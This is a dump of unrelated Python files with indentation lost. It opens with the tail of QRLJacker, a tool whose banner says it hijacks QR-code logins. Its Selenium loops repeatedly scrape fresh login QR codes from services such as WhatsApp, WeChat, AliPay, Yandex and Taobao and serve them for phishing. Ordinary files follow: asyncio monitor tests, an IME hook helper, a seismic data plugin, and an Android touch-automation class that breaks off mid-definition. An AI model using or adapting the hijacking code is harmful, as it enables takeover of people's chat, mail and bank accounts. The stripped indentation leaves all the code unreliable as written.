websites = settings.sections()
if website == "00":
main()
try:
section = websites[int(website)]
except:
        return Use_website()
method = int( settings.get(section,"method") )
if int(method) == 1:
classname = settings.get(section,"classname")
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
First_Method(classname,url,image_number,Seconds)
main()
elif int(method) == 2:
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
Second_Method(url,image_number,Seconds)
main()
elif int(method) == 3:
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
Third_Method(url,image_number,Seconds)
main()
else:
Use_website()
def Remove_website():
settings.read(os.path.join('Data', 'Custom.ini'))
print "\n"
for n,w in enumerate(settings.sections()):
print " "+str(n)+"."+w.encode("utf-8")
print " 00.Back To Main Menu"
website = raw_input("\n Select website > ")
websites = settings.sections()
if website == "00":
main()
try:
section = websites[int(website)]
except:
        return Remove_website()
    settings.remove_section(section)
    settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
    print " [*] Website removed."
time.sleep(5)
main()
def First_Method(classname,url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
login = driver.find_element_by_class_name(classname)
img = login.find_elements_by_tag_name('img')[int(image_number)]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Second_Method(url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[int(image_number)]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Third_Method(url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(10)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
driver.save_screenshot('tmp.png') #screenshot entire page
img = driver.find_elements_by_tag_name("img")[int(image_number)]
print " [*] QR code image detected !"
location = img.location
size = img.size
print " [*] Grabbing photo.."
Screenshot("tmp.png" ,location ,size)
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def main():
clear()
print """
____ _____ _ _ _
/ __ \| __ \| | | | | |
| | | | |__) | | | | __ _ ___| | _____ _ __
| | | | _ /| | _ | |/ _` |/ __| |/ / _ \ '__|
| |__| | | \ \| |___| |__| | (_| | (__| < __/ |
\___\_\_| \_\______\____/ \__,_|\___|_|\_\___|_|
    #QRLJacker is a customizable framework to demonstrate the "QRLJacking Attack Vector" and shows how easy it is to hijack services that rely on QR Code Authentication!
#A Social Engineering Attack Vector by: Mohamed A. Baset (@SymbianSyMoh)
#Coded by: Karim Shoair (@D4Vinci)
Vulnerable Web Applications and Services:
1.Chat Applications
2.Mailing Services
3.eCommerce
4.Online Banking
5.Passport Services
6.Mobile Management Software
7.Other Services
8.Customization
9.Exit
"""
choice = raw_input(" Choice > ")
if not choice.isdigit():
main()
else:
choice = int(choice)
#Chat Applications
if choice == 9:
exit()
if choice == 1:
print """
1.WhatsApp
2.WeChat
3.Weibo
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Whatsapp
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Whatsapp" , port )
Serve_it(port)
whatsapp()
main()
#Wechat
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "WeChat" , port )
Serve_it(port)
WeChat()
main()
#Weibo
elif int(choice_2) == 3:
port = raw_input(" Port to listen on (Default 1337) : ")
if port == "":port = 1337
clear()
make( "Weibo" , port )
Serve_it(port)
Weibo()
main()
else:
main()
#Mailing Services
if choice == 2:
print """
1.Yandex Mail
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Yandex Mail
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#eCommerce
if choice == 3:
print """
1.Taobao
2.Taobao Trips
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Taobao
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Taobao" , port )
Serve_it(port)
Taobao()
main()
#Taobao Trips
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Taobao Trips" , port )
Serve_it(port)
Taobao()
main()
else:
main()
#Online Banking
if choice == 4:
print """
1.AliPay
2.Yandex Money
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#AliPay
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "AliPay" , port )
Serve_it(port)
AliPay()
main()
#Yandex Money
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex Money" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#Passport Services
if choice == 5:
print """
1.Yandex Passport
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Yandex Passport
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex passport" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#Mobile Management Software
if choice == 6:
print """
1.Airdroid
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Airdroid
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Airdroid" , port )
Serve_it(port)
Airdroid()
main()
else:
main()
#Other Services
if choice == 7:
print """
1.MyDigiPass
2.Zapper
3.Trustly App
4.Yelophone
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#MyDigiPass
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "MyDigiPass" , port )
Serve_it(port)
mydigipass()
main()
#Zapper
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Zapper" , port )
Serve_it(port)
Zapper()
main()
#Trustly App
elif int(choice_2) == 3:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Trustly app" , port )
Serve_it(port)
Trustly_App()
main()
#Yelophone
elif int(choice_2) == 4:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yelophone" , port )
Serve_it(port)
Yelophone()
main()
else:
main()
#Customization
if choice == 8:
print " 1.Add a new website."
print " 2.Use an existing website."
print " 3.Remove an existing website."
print " 00.Back To Main Menu"
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
elif int(choice_2) == 1:
Add_website()
elif int(choice_2) == 2:
Use_website()
elif int(choice_2) == 3:
Remove_website()
else:
main()
#settings.read(os.path.join('Data', 'Custom.ini'))
#sections = settings.sections()
#url = settings.get(section,"url")
#settings.add_section(name)
#settings.set(name,"url",url)
#settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
else:
main()
if __name__ == '__main__':
main()
|
test_monitor.py
|
from __future__ import annotations
import asyncio
import sys
import time
from contextlib import contextmanager
from threading import Thread
from typing import Generator
import pytest
from pytest_mock import MockerFixture
import loopmon
@contextmanager
def with_event_loop() -> Generator[asyncio.AbstractEventLoop, None, None]:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
yield loop
loop.run_until_complete(asyncio.sleep(0))
to_cancel = asyncio.tasks.all_tasks(loop)
for t in to_cancel:
t.cancel()
results = loop.run_until_complete(asyncio.tasks.gather(*to_cancel, return_exceptions=True))
assert all(not isinstance(r, BaseException) for r in results)
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
def test_can_catch_loop_close() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
assert not monitor.running
def test_can_execute_callback(mocker: MockerFixture) -> None:
interval = 0.01
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
mock = mocker.AsyncMock()
monitor = loopmon.create(loop, interval=interval, callbacks=(mock,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(interval * 1.5))
assert monitor.running
mock.assert_awaited_once()
assert not monitor.running
def test_can_detect_lag_comes_from_block_call(mocker: MockerFixture) -> None:
interval = 0.01
blocking_delay = 0.1
with with_event_loop() as loop:
mock = mocker.AsyncMock()
monitor = loopmon.create(loop, interval=interval, callbacks=(mock,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
# Block whole python interpreter
time.sleep(blocking_delay)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
mock.assert_awaited_once()
measured_lag = mock.await_args.args[0]
# 10% margin
assert blocking_delay * 0.9 <= measured_lag <= blocking_delay * 1.1
assert not monitor.running
def test_can_not_install_to_closed_loop() -> None:
loop = asyncio.new_event_loop()
loop.close()
with pytest.raises(ValueError):
loopmon.create(loop)
def test_can_not_install_to_already_installed_loop() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
with pytest.raises(ValueError):
monitor.install_to_loop(loop)
def test_can_not_double_start() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop)
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
with pytest.raises(ValueError):
loop.run_until_complete(monitor.start())
@pytest.mark.skipif(sys.version_info < (3, 8), reason='requires python3.8 or higher')
def test_can_configure_task_name() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop, name='loopmon_task')
tasks = asyncio.all_tasks(loop)
assert any(t.get_name() == monitor.name for t in tasks)
def test_can_stop_running_monitor() -> None:
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
monitor = loopmon.create(loop, name='loopmon_task')
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
assert monitor.running
loop.run_until_complete(monitor.stop())
assert not monitor.running
# Give loop time to stop loopmon
loop.run_until_complete(asyncio.sleep(0.1))
tasks = asyncio.all_tasks(loop)
assert not any(t.get_name() == monitor.name for t in tasks)
def test_can_detect_lag_of_another_thread(mocker: MockerFixture) -> None:
delay_sec = 1
interval = 0.1
def body_of_another_thread(mon: loopmon.EventLoopMonitor) -> None:
async def _inner() -> None:
mon.install_to_loop()
await asyncio.sleep(0)
assert mon.running
# block this thread -> `mon` must not collect during this blocking
time.sleep(delay_sec)
# Give mon time to collect lag
await asyncio.sleep(interval / 2)
await mon.stop()
assert not mon.running
asyncio.run(_inner())
with with_event_loop() as loop: # type: asyncio.AbstractEventLoop
mock_of_main_thread = mocker.AsyncMock()
monitor_of_main_thread = loopmon.create(loop, interval=interval, callbacks=(mock_of_main_thread,))
# Give loop time to run loopmon
loop.run_until_complete(asyncio.sleep(0))
mock_of_another_thread = mocker.AsyncMock()
monitor_of_another_thread = loopmon.SleepEventLoopMonitor(
interval=interval,
callbacks=(mock_of_another_thread,),
)
t = Thread(target=body_of_another_thread, args=(monitor_of_another_thread,))
t.start()
        # Wait for the other thread to finish while the main thread's loop keeps running,
        # so `monitor_of_main_thread` keeps collecting without any lag, while
        # `monitor_of_another_thread` cannot collect anything during its blocking sleep.
loop.run_until_complete(loop.run_in_executor(None, t.join))
loop.run_until_complete(asyncio.sleep(0))
loop.run_until_complete(monitor_of_main_thread.stop())
assert mock_of_main_thread.await_count == delay_sec / interval
assert mock_of_another_thread.await_count == 1
|
globalhook.py
|
# -*- coding: utf-8 -*-
import ctypes
from os.path import join, dirname, abspath
INVALID_VALUE = 0xffff
WM_IMESUPPORT_SET_INLINE_POSITION = -1
imesupport_dll = None
def setup(arch_x64, dll_dir=dirname(dirname(abspath(__file__)))):
# Default DLL location: ../imesupport_hook_xxx.dll
global imesupport_dll
global WM_IMESUPPORT_SET_INLINE_POSITION
if imesupport_dll is not None:
return True
imesupport_dll = ctypes.cdll.LoadLibrary(
join(dll_dir,
'imesupport_hook_x64.dll' if arch_x64 else
'imesupport_hook_x86.dll'
))
WM_IMESUPPORT_SET_INLINE_POSITION = imesupport_dll.GetMessageId()
return imesupport_dll.StartHook()
def term():
global imesupport_dll
if imesupport_dll is not None:
imesupport_dll.EndHook()
del imesupport_dll
imesupport_dll = None
def set_inline_position(hwnd, x, y, font_face, font_height):
# TODO Use font_face
if imesupport_dll is not None:
ctypes.windll.user32.PostMessageW(
hwnd, WM_IMESUPPORT_SET_INLINE_POSITION, x << 16 | y, font_height)
def clear_inline_position(hwnd):
if imesupport_dll is not None:
ctypes.windll.user32.PostMessageW(
hwnd, WM_IMESUPPORT_SET_INLINE_POSITION, INVALID_VALUE, INVALID_VALUE)
def main():
import time
from multiprocessing import Process
p = Process(target=window_process)
p.start()
time.sleep(1)
test()
p.join()
TEST_CLASSNAME = 'test_win32gui_1'
def test():
x = 100
y = 100
font_height = 40
import platform
assert setup(platform.machine() == 'AMD64')
hwnd = ctypes.windll.user32.FindWindowW(TEST_CLASSNAME, 0)
assert hwnd != 0
set_inline_position(hwnd, x, y, 'font', font_height)
def window_process():
# Required pywin32
import win32gui
import win32con
import time
# Original: http://kb.worldviz.com/articles/791
def OnKeyDown(hwnd, msg, wp, lp):
print('Original OnKeyDown')
def OnClose(hwnd, msg, wparam, lparam):
"""Destroy window when it is closed by user"""
win32gui.DestroyWindow(hwnd)
def OnDestroy(hwnd, msg, wparam, lparam):
"""Quit application when window is destroyed"""
win32gui.PostQuitMessage(0)
#Define message map for window
wndproc = {
win32con.WM_KEYDOWN: OnKeyDown,
win32con.WM_CLOSE: OnClose,
win32con.WM_DESTROY: OnDestroy
}
def CreateWindow(title, message_map, location):
"""Create a window with defined title, message map, and rectangle"""
l, t, r, b = location
wc = win32gui.WNDCLASS()
wc.lpszClassName = TEST_CLASSNAME
wc.style = win32con.CS_GLOBALCLASS | win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
wc.lpfnWndProc = message_map
win32gui.RegisterClass(wc)
win32gui.CreateWindow(wc.lpszClassName,
title,
win32con.WS_CAPTION | win32con.WS_VISIBLE | win32con.WS_SYSMENU,
l, t, r, b, 0, 0, 0, None)
while win32gui.PumpWaitingMessages() == 0:
time.sleep(0.01)
win32gui.UnregisterClass(wc.lpszClassName, None)
#Display sample window
CreateWindow('Pywin32 sample', wndproc, (100, 100, 500, 200))
if __name__ == '__main__':
main()
|
dev_orb_plugin.py
|
#!/usr/bin/python
import os
import sys
import pickle
import time
import subprocess
import threading
import shutil
from pyon.public import CFG
class DataAgentPrototype():
def __init__(self, plugin):
self.sampling_gl = None
self.sampling_gl_done = None
self.plugin = plugin
self.streaming_args = None
def on_start_streaming(self, streaming_args):
print 'DataAgent.on_start_streaming'
self.plugin.on_start_streaming(streaming_args)
self.streaming_args = streaming_args
self.sampling_gl_done = threading.Event()
self.sampling_gl = threading.Thread(target=self._sample_data_loop)
self.sampling_gl.start()
def on_stop_streaming(self):
print 'DataAgent.on_stop_streaming'
self.plugin.on_stop_streaming()
self.sampling_gl_done.set()
self.sampling_gl.join()
def _sample_data_loop(self):
print 'Sampling greenlet started.'
while not self.sampling_gl_done.is_set():
time.sleep(self.streaming_args['sample_interval'])
self.plugin.acquire_samples()
print 'sampling greenlet done, exiting.'
class OrbPluginPrototype():
def __init__(self):
self.proc = None
self.acquire_thread = None
self.streaming_args = None
def on_start_streaming(self, streaming_args):
print 'OrbPluginPrototype.on_start_streaming'
self.streaming_args = streaming_args
cmd_args = ['orb_reap', './orbstart.py', streaming_args['orb_name'], streaming_args['select']]
        if 'reject' in streaming_args:
            cmd_args.extend(['--reject', streaming_args['reject']])
        if 'after' in streaming_args:
            cmd_args.extend(['--after', streaming_args['after']])
        if 'timeout' in streaming_args:
            cmd_args.extend(['--timeout', streaming_args['timeout']])
        if 'qsize' in streaming_args:
            cmd_args.extend(['--qsize', streaming_args['qsize']])
print str(cmd_args)
antelope_path = CFG.get_safe("scion.antelope.path", "/opt/antelope/5.6")
self.proc = subprocess.Popen(cmd_args, executable=antelope_path+'/bin/python')
print 'Orb reap process started, ', self.proc.pid
self.data_dir = '/tmp/scion-data/%s/' % (streaming_args['select'].replace('/', '-'))
def on_stop_streaming(self):
print 'OrbPluginPrototype.on_stop_streaming'
self.proc.terminate()
print 'Waiting for orb reap to terminate...'
retcode = self.proc.wait()
print 'Orb reap process terminated, ', self.proc.pid
self.proc = None
def acquire_samples(self):
print 'Plugin acquiring samples...'
if os.path.exists(self.data_dir):
files = os.listdir(self.data_dir)
print 'Samples present: '
for f in files:
fpath = self.data_dir + f
print fpath
if __name__ == '__main__':
# This test code is a placeholder for the
# SciON DataAgent control flow so we can
# port it over easily.
# Coming in from the agent config.
streaming_args = {
'orb_name': 'taexport.ucsd.edu:usarrayTA',
# 'select' : 'TA_109C/MGENC/M40',
'select': 'TA_121A/MGENC/M40',
'--timeout': 5,
'sample_interval': 5
}
# Agent config specifies which class to construct.
plugin = OrbPluginPrototype()
# DataAgent
agent = DataAgentPrototype(plugin)
# Start streaming.
agent.on_start_streaming(streaming_args)
# Time passes.
time.sleep(30)
# DataAgent on_stop_streaming is activated.
agent.on_stop_streaming()
|
base_touch.py
|
# -*- coding: utf-8 -*-
import threading
import time
import six
from six.moves import queue
from airtest.utils.logger import get_logger
from airtest.utils.snippet import (on_method_ready, ready_method, reg_cleanup, kill_proc)
LOGGING = get_logger(__name__)
class BaseTouch(object):
"""
A super class for Minitouch or Maxtouch
"""
def __init__(self, adb, backend=False, ori_function=None, input_event=None, *args, **kwargs):
self.adb = adb
self.backend = backend
self.server_proc = None
self.client = None
self.size_info = None
self.input_event = input_event
self.handle = None
self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo
self.default_pressure = 50
self.path_in_android = ""
reg_cleanup(self.teardown)
@ready_method
def install_and_setup(self):
"""
Install and setup airtest touch
Returns:
None
"""
self.install()
self.size_info = self.ori_function()
self.setup_server()
if self.backend:
self.setup_client_backend()
else:
self.setup_client()
def uninstall(self):
"""
Uninstall airtest touch
Returns:
None
"""
        raise NotImplementedError
def install(self):
"""
Install airtest touch
Returns:
None
"""
        raise NotImplementedError
def setup_server(self):
"""
        Setup touch server and adb forward
Returns:
server process
"""
        raise NotImplementedError
def safe_send(self, data):
"""
Send data to client
Args:
data: data to send
Raises:
Exception: when data cannot be sent
Returns:
None
"""
if isinstance(data, six.text_type):
data = data.encode('utf-8')
try:
self.client.send(data)
except Exception as err:
# raise MinitouchError(err)
raise err
def _backend_worker(self):
"""
Backend worker queue thread
Returns:
None
"""
while not self.backend_stop_event.isSet():
cmd = self.backend_queue.get()
if cmd is None:
break
self.safe_send(cmd)
def setup_client_backend(self):
"""
Setup backend client thread as daemon
Returns:
None
"""
self.backend_queue = queue.Queue()
self.backend_stop_event = threading.Event()
self.setup_client()
t = threading.Thread(target=self._backend_worker, name="airtouch")
# t.daemon = True
t.start()
self.backend_thread = t
self.handle = self.backend_queue.put
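        # In backend mode self.handle is the queue's put(): callers enqueue raw protocol
        # commands and the "airtouch" worker thread drains the queue and sends them, so
        # perform()/operate() never block on the socket. In non-backend mode setup_client()
        # (implemented by the Minitouch/Maxtouch subclasses) is expected to wire self.handle
        # to a direct send instead.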
def setup_client(self):
"""
Setup client
Returns:
None
"""
        raise NotImplementedError
def teardown(self):
"""
Stop the server and client
Returns:
None
"""
if hasattr(self, "backend_stop_event"):
self.backend_stop_event.set()
self.backend_queue.put(None)
if self.client:
self.client.close()
if self.server_proc:
kill_proc(self.server_proc)
def transform_xy(self, x, y):
"""
Transform coordinates (x, y) according to the device display
Args:
x: coordinate x
y: coordinate y
Returns:
transformed coordinates (x, y)
"""
return x, y
@on_method_ready('install_and_setup')
def perform(self, motion_events, interval=0.01):
"""
Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent
Args:
motion_events: a list of MotionEvent instances
interval: minimum interval between events
Returns:
None
"""
for event in motion_events:
if isinstance(event, SleepEvent):
time.sleep(event.seconds)
else:
cmd = event.getcmd(transform=self.transform_xy)
self.handle(cmd)
time.sleep(interval)
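    # For reference, touch() below is simply perform([DownEvent(xy), SleepEvent(d), UpEvent()]),
    # and swipe()/two_finger_swipe()/pinch() build longer MotionEvent sequences in the same
    # way before handing them to perform().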
@on_method_ready('install_and_setup')
def touch(self, tuple_xy, duration=0.01):
"""
Perform touch event
minitouch protocol example::
d 0 10 10 50
c
<wait in your own code>
u 0
c
Args:
tuple_xy: coordinates (x, y)
duration: time interval for touch event, default is 0.01
Returns:
None
"""
touch_events = [DownEvent(tuple_xy, pressure=self.default_pressure), SleepEvent(duration), UpEvent()]
self.perform(touch_events)
def __swipe_move(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Return a sequence of swipe motion events (only MoveEvent)
minitouch protocol example::
d 0 0 0 50
c
m 0 20 0 50
c
m 0 40 0 50
c
m 0 60 0 50
c
m 0 80 0 50
c
m 0 100 0 50
c
u 0
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
[MoveEvent(from_x, from_y), ..., MoveEvent(to_x, to_y)]
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
ret = []
interval = float(duration) / (steps + 1)
for i in range(1, steps):
ret.append(MoveEvent((from_x + (to_x - from_x) * i / steps,
from_y + (to_y - from_y) * i / steps)))
ret.append(SleepEvent(interval))
ret += [MoveEvent((to_x, to_y), pressure=self.default_pressure), SleepEvent(interval)]
return ret
@on_method_ready('install_and_setup')
def swipe_along(self, coordinates_list, duration=0.8, steps=5):
"""
Perform swipe event across multiple points in sequence.
Args:
coordinates_list: list of coordinates: [(x1, y1), (x2, y2), (x3, y3)]
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
tuple_from_xy = coordinates_list[0]
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
for tuple_to_xy in coordinates_list[1:]:
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
tuple_from_xy = tuple_to_xy
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
"""
Perform swipe event.
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
Returns:
None
"""
swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
swipe_events.append(UpEvent())
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5, offset=(0, 50)):
"""
Perform two finger swipe action
minitouch protocol example::
d 0 0 0 50
d 1 1 0 50
c
m 0 20 0 50
m 1 21 0 50
c
m 0 40 0 50
m 1 41 0 50
c
m 0 60 0 50
m 1 61 0 50
c
m 0 80 0 50
m 1 81 0 50
c
m 0 100 0 50
m 1 101 0 50
c
u 0
u 1
c
Args:
tuple_from_xy: start point
tuple_to_xy: end point
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
offset: coordinate offset of the second finger, default is (0, 50)
Returns:
None
"""
from_x, from_y = tuple_from_xy
to_x, to_y = tuple_to_xy
        # Compute the second finger's coordinates from the offset
from_x2, from_y2 = (min(max(0, from_x + offset[0]), self.size_info['width']),
min(max(0, from_y + offset[1]), self.size_info['height']))
to_x2, to_y2 = (min(max(0, to_x + offset[0]), self.size_info['width']),
min(max(0, to_y + offset[1]), self.size_info['height']))
swipe_events = [DownEvent(tuple_from_xy, contact=0, pressure=self.default_pressure),
DownEvent((from_x2, from_y2), contact=1, pressure=self.default_pressure),
]
interval = float(duration) / (steps + 1)
for i in range(1, steps + 1):
move_events = [
SleepEvent(interval),
MoveEvent((from_x + ((to_x - from_x) * i / steps), from_y + (to_y - from_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((from_x2 + (to_x2 - from_x2) * i / steps, from_y2 + (to_y2 - from_y2) * i / steps),
contact=1, pressure=self.default_pressure),
]
swipe_events.extend(move_events)
swipe_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(swipe_events)
@on_method_ready('install_and_setup')
def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'):
"""
Perform pinch action
minitouch protocol example::
d 0 0 100 50
d 1 100 0 50
c
m 0 10 90 50
m 1 90 10 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 20 80 50
m 1 80 20 50
c
m 0 30 70 50
m 1 70 30 50
c
m 0 40 60 50
m 1 60 40 50
c
m 0 50 50 50
m 1 50 50 50
c
u 0
u 1
c
Args:
center: the center point of the pinch operation
percent: pinch distance to half of screen, default is 0.5
duration: time interval for swipe duration, default is 0.8
steps: size of swipe step, default is 5
in_or_out: pinch in or pinch out, default is 'in'
Returns:
None
Raises:
TypeError: An error occurred when center is not a list/tuple or None
"""
w, h = self.size_info['width'], self.size_info['height']
if isinstance(center, (list, tuple)):
x0, y0 = center
elif center is None:
x0, y0 = w / 2, h / 2
else:
raise TypeError("center should be None or list/tuple, not %s" % repr(center))
x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2
x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2
pinch_events = []
interval = float(duration) / (steps + 1)
        # Set the start and end coordinates of both fingers depending on pinch in or out
if in_or_out == 'in':
start_pos1_x, start_pos1_y = x1, y1
start_pos2_x, start_pos2_y = x2, y2
end_pos1_x, end_pos1_y = x0, y0
end_pos2_x, end_pos2_y = x0, y0
else:
start_pos1_x, start_pos1_y = x0, y0
start_pos2_x, start_pos2_y = x0, y0
end_pos1_x, end_pos1_y = x1, y1
end_pos2_x, end_pos2_y = x2, y2
        # Build the pinch event sequence
pinch_events.extend([
DownEvent((start_pos1_x, start_pos1_y), contact=0, pressure=self.default_pressure),
DownEvent((start_pos2_x, start_pos2_y), contact=1, pressure=self.default_pressure)
])
for i in range(1, steps):
pinch_events.extend([
SleepEvent(interval),
MoveEvent((start_pos1_x + (end_pos1_x - start_pos1_x) * i / steps,
start_pos1_y + (end_pos1_y - start_pos1_y) * i / steps),
contact=0, pressure=self.default_pressure),
MoveEvent((start_pos2_x + (end_pos2_x - start_pos2_x) * i / steps,
start_pos2_y + (end_pos2_y - start_pos2_y) * i / steps),
contact=1, pressure=self.default_pressure)
])
pinch_events.extend([
SleepEvent(interval),
MoveEvent((end_pos1_x, end_pos1_y), contact=0, pressure=self.default_pressure),
MoveEvent((end_pos2_x, end_pos2_y), contact=1, pressure=self.default_pressure)
])
pinch_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
self.perform(pinch_events)
@on_method_ready('install_and_setup')
def operate(self, args):
"""
Perform down, up and move actions
Args:
args: action arguments, dictionary containing type and x, y coordinates, e.g.::
{
"type" : "down",
"x" : 10,
"y" : 10
}
Raises:
            RuntimeError: if invalid arguments are provided
Returns:
None
"""
if args["type"] == "down":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "d 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "move":
x, y = self.transform_xy(args["x"], args["y"])
cmd = "m 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
elif args["type"] == "up":
cmd = "u 0\nc\n"
else:
raise RuntimeError("invalid operate args: {}".format(args))
self.handle(cmd)
class MotionEvent(object):
"""
Motion Event to be performed by Minitouch/Maxtouch
"""
def getcmd(self, transform=None):
raise NotImplementedError
class DownEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Down Event
:param coordinates: finger down coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(DownEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
